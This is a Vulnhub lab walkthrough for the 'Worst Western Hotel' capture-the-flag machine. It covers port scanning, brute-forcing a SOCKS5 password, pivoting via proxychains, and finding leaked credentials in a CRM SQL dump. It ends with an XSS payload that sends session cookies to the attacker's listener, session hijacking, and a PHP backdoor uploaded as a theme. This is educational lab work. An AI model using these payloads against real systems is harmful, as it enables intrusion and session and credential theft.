WORST WESTERN HOTEL: 1

Vulnhub Walkthrough

Today we are doing a another machine from https://twitter.com/4nqr34z

Goal : Your objective is to pwn a hotel. :-)

Important: This box probably needs to be run in an isolated environment (Host-Only network), or it might disrupt your internal network. You should of course always run downloaded vm that way.

Hint: Foothold is inspired by one of these vulnerabilities:

Initial Lab Setup :

From here you can download the machine and setup it on your virtualbox, and use the Host only adapter.

https://www.vulnhub.com/entry/worst-western-hotel-1,693/

Tip : If you’re using a 1 series i.e : 192.168.1.* network kindly change it, cause you are going to face some problem with that series.

Let’s start with reconnaissance

Here is the machine IP in my case it is 192.168.56.6

Let’s start with scanning.

Here i found 2 open ports 80 and 1080.

So afterhitting port 80 found website running on it.

So i move towards to scan directories and performed a complete nmap scan.

┌─[root@v0ld3rm0rt]─[~]
└──╼ #nmap -v -sV -sC -A -sT -p- 192.168.56.6
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-22 15:22 IST
NSE: Loaded 153 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 15:22
Completed NSE at 15:22, 0.00s elapsed
Initiating NSE at 15:22
Completed NSE at 15:22, 0.00s elapsed
Initiating NSE at 15:22
Completed NSE at 15:22, 0.00s elapsed
Initiating ARP Ping Scan at 15:22
Scanning 192.168.56.6 [1 port]
Completed ARP Ping Scan at 15:22, 0.05s elapsed (1 total hosts)
Initiating Connect Scan at 15:22
Scanning worstwestern.com (192.168.56.6) [65535 ports]
Discovered open port 80/tcp on 192.168.56.6
Discovered open port 1080/tcp on 192.168.56.6

Completed Connect Scan at 15:22, 2.04s elapsed (65535 total ports)
Initiating Service scan at 15:22
Scanning 2 services on worstwestern.com (192.168.56.6)
Completed Service scan at 15:23, 6.07s elapsed (2 services on 1 host)
Initiating OS detection (try #1) against worstwestern.com (192.168.56.6)
NSE: Script scanning 192.168.56.6.
Initiating NSE at 15:23
Completed NSE at 15:23, 0.55s elapsed
Initiating NSE at 15:23
Completed NSE at 15:23, 0.03s elapsed
Initiating NSE at 15:23
Completed NSE at 15:23, 0.00s elapsed
Nmap scan report for worstwestern.com (192.168.56.6)
Host is up (0.00084s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Did not follow redirect to http://prime.worstwestern.com/
1080/tcp open socks5 (Username/password authentication required)
| socks-auth-info:
| No authentication
|_ Username and password
MAC Address: 08:00:27:C7:29:83 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6
Uptime guess: 36.536 days (since Fri Apr 16 02:31:37 2021)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=257 (Good luck!)
IP ID Sequence Generation: All zeros

Only got the info that the socks have authentication.

For accessing the socks we need credentials.

So i move forward with Port 80.

I runed gobuster, nikto and all but nothing found intresting.

and i runed go buster on in with some extensions filter. and found one common.txt.

After hitting this file on browser got credentials and small message.

and i move forward to use socks5 that we’ve already discovered in nmap scan.

I tried with that credentials but not worked, after that i payed attention on message again and saw, might be the password is changed so i bruteforce socks5 password.

i found the nmap script to bruteforce the password.

┌─[root@v0ld3rm0rt]─[/usr/share/nmap/scripts]
└──╼ #nmap -v -sT -sV -p 1080 --script=socks-brute.nse --script-args="userdb=Prime,passdb=/usr/share/wordlist/rockyou.txt" 192.168.56.6
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-22 19:39 IST
NSE: Loaded 1 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 19:39
Completed NSE at 19:39, 0.00s elapsed
Initiating ARP Ping Scan at 19:39
Scanning 192.168.56.6 [1 port]
Completed ARP Ping Scan at 19:39, 0.06s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 19:39
Scanning worstwestern.com (192.168.56.6) [1 port]
Discovered open port 1080/tcp on 192.168.56.6
Completed SYN Stealth Scan at 19:39, 0.05s elapsed (1 total ports)
NSE: Script scanning 192.168.56.6.
Initiating NSE at 19:39
NSE Timing: About 4.76% done; ETC: 20:27 (0:45:40 remaining)
Completed NSE at 19:41, 136.79s elapsed
Nmap scan report for worstwestern.com (192.168.56.6)
Host is up (0.00035s latency).

PORT STATE SERVICE
1080/tcp open socks
| socks-brute:
| Accounts:
| Prime:tinkerbell1 - Valid credentials
|_ Statistics: Performed 7379 guesses in 118 seconds, average tps: 111.1
MAC Address: 08:00:27:C7:29:83 (Oracle VirtualBox virtual NIC)

NSE: Script Post-scanning.
Initiating NSE at 19:41
Completed NSE at 19:41, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 139.56 seconds
Raw packets sent: 2 (72B) | Rcvd: 2 (72B)

Note : If the about command doesn’t work so replace the default password and username list with rockyou.txt and given username.

Path to replace file : /usr/share/nmap/nselib/data

Then i setuped proxychains with given credentials.

You can use any chains you like and don’t forget to comment proxy_dns.

After that i scanned for a 192.168.1.0/24 but not found any live ip so i use netdiscover.

┌─[root@v0ld3rm0rt]─[/opt]
└──╼ #netdiscover -i vboxnet0

Than got 4 ips in which one is my machine one is host only network gateway and 2 is unidentified.

So i move forward to scan that ips.

┌─[root@v0ld3rm0rt]─[/opt]
└──╼ #proxychains nmap -Pn -sT -sC 192.168.0.1
Nmap scan report for 192.168.0.1
Host is up (0.011s latency).
Not shown: 996 closed ports
PORT STATE SERVICE
22/tcp open ssh
| ssh-hostkey:
| 2048 80:5b:75:66:8d:4f:87:03:97:8c:fe:eb:d0:c0:bd:aa (RSA)
| 256 6f:4d:6f:9c:9a:12:6d:c4:b7:f5:55:45:d7:d9:89:09 (ECDSA)
|_ 256 bd:71:f5:24:96:4a:40:83:ec:ec:d2:0d:a4:12:76:9e (ED25519)
80/tcp open http
|_http-title: Did not follow redirect to http://prime.worstwestern.com/
443/tcp open https
| http-cookie-flags:
| /:
| PHPSESSID:
| secure flag not set and HTTPS in use
|_ httponly flag not set
|_http-title: CRM | Login
| ssl-cert: Subject: commonName=crm.worstwestern.com/organizationName=WorstWestern/stateOrProvinceName=Some-State/countryName=AU
| Not valid before: 2020-10-18T19:16:18
|_Not valid after: 2102-12-08T19:16:18
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
1080/tcp open socks

Nmap done: 1 IP address (1 host up) scanned in 42.06 seconds

After running nmap on 192.168.0.1 with proxychains found multiple open ports.

so in the port 443 CRM panel is running.

Then i runed dirb

┌─[root@v0ld3rm0rt]─[/opt]
└──╼ #proxychains dirb https://192.168.0.1 -wordlist /usr/share/seclists/Discovery/Web-Content/common.txt
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.14

-----------------
DIRB v2.22
By The Dark Raver
-----------------

OUTPUT_FILE: rdlist
START_TIME: Sat May 22 23:47:45 2021
URL_BASE: https://192.168.0.1/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
OPTION: Not Stopping on warning messages

-----------------

GENERATED WORDS: 4612

---- Scanning URL: https://192.168.0.1/ ----
==> DIRECTORY: https://192.168.0.1/admin/
==> DIRECTORY: https://192.168.0.1/assets/
==> DIRECTORY: https://192.168.0.1/crm/

And found admin directory on it.

and nothing more,

Then i used nikto to scan again,

┌─[root@v0ld3rm0rt]─[/opt]
└──╼ #proxychains nikto -h https://crm.worstwestern.com
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.14
[proxychains] DLL init: proxychains-ng 4.14
- Nikto v2.1.6
---------------------------------------------------------------------------
[proxychains] Strict chain ... 192.168.56.6:1080 ... 192.168.0.1:443 ... OK
[proxychains] Strict chain ... 192.168.56.6:1080 ... 192.168.0.1:443 ... OK
+ Target IP: 192.168.0.1
+ Target Hostname: crm.worstwestern.com
+ Target Port: 443
---------------------------------------------------------------------------
+ SSL Info: Subject: /C=AU/ST=Some-State/O=WorstWestern/OU=Prime/CN=crm.worstwestern.com
Ciphers: TLS_AES_256_GCM_SHA384
Issuer: /C=AU/ST=Some-State/O=WorstWestern/OU=Prime/CN=crm.worstwestern.com
+ Start Time: 2021-05-23 09:59:13 (GMT5.5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
[proxychains] Strict chain ... 192.168.56.6:1080 ... 192.168.0.1:443 ... OK
+ Cookie PHPSESSID created without the secure flag
+ Cookie PHPSESSID created without the httponly flag
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
+ The site uses SSL and Expect-CT header is not present.
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /crm.sql: Potentially interesting archive/cert file found.
+ /crm.sql: Potentially interesting archive/cert file found. (NOTE: requested by IP address)
+ The Content-Encoding header is set to "deflate" this may mean that the server is vulnerable to the BREACH attack.

Found crucial file.

after downloading it, found the credentials of users,

To view more in sophesticated way import it on the phpmyadmin.

Here we are we only found the credentials of normal user nothing more.

With this normal user credentials i’m able to gain access of admin panel,

Where i can manage all the tickets, user profile and the quota requested.

After searching a lot not able to find any option to upload or get a shell from that panel,

only able to find 2 more user, now we have total 7 users credentials.

But in the all 7 users no one is useful, so i leave it here and move forward to find some other thing.

So again we are on the same step.

as of now we only have the socks5 credentials.

So i again runed a nmap scan withproxychains on the 192.168.1.0/24 with some selected ports.

┌─[root@v0ld3rm0rt]─[~]
└──╼ #proxychains nmap -sT -Pn -p 80,443 192.168.1.0/24

Nmap scan report for 192.168.1.124
Host is up (0.034s latency).

PORT STATE SERVICE
22/tcp closed ssh
80/tcp open http
443/tcp open https

So we got one more ip in which port 80 and 443 is open.

And here we got a login panel.

But not have the credentials.

After enumerating too much found it is vulnerable to XSS.

I tried with simple XSS payload

<script>alert("RXSS01");</script>

And meanwhile it gives me result in the whatweb

So i move towaards to get reverse shell from XSS.

<script>window.location='http://192.168.56.1/php-reverse-shell.php'</script>

With this payload i was able to upload shell on it, but it is was difficult to find the path where it goes.

Because it’s vulnerable to XSS so i decied to hijack the session using its cookies.

<script>new Image().src="">http://192.168.56.1/abc.php?output="+document.cookie;</script>

So, I inected this payload using the username section and also in the same i started a listner at port 80

To capture the request.

┌─[root@v0ld3rm0rt]─[~/vm/HotelWW]
└──╼ #nc -nlvp 80
listening on [any] 80 ...
connect to [192.168.56.1] from (UNKNOWN) [192.168.56.7] 38750
GET /abc.php?output=PHPSESSID=kmcclhb238hk8unffrdjf58el9 HTTP/1.1
Referer: http://192.168.1.124/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36
Accept: */*
Connection: Keep-Alive
Accept-Encoding: gzip, deflate
Accept-Language: en,*
Host: 192.168.56.1

Once it auto executed in the system then we got the session id.

Then i imported the cookies using the Cookie Editor addon.

You can find the cookie editor here.

After importing a cookies we got a access of camera panel.

So we have a panel but there is no any place to upload a shell.

In the sourcecode i found all the file name is in plain text expect one of them.

so i move forward with that encrypted file.

And i found credentials on that image.

peterg:Birdistheword

then i went to the main website and hit the admin panel and enter the credentials.

Now we are in the panel.

Its time to get a reverse shell.

what we need to do here is add a new zip theme with out php backdoor.

I googled about Qloapps theme but all is paid so i export its own theme and insert our payload and again added in the webpanel.

https://prime.worstwestern.com/themes/hotel-reservation-theme/preview.jpg

We got a shell, Now its time for privesec.

Captured first flag.

and the Database credentials.

After that tried alot things for privesec but not working.

So will do later that part.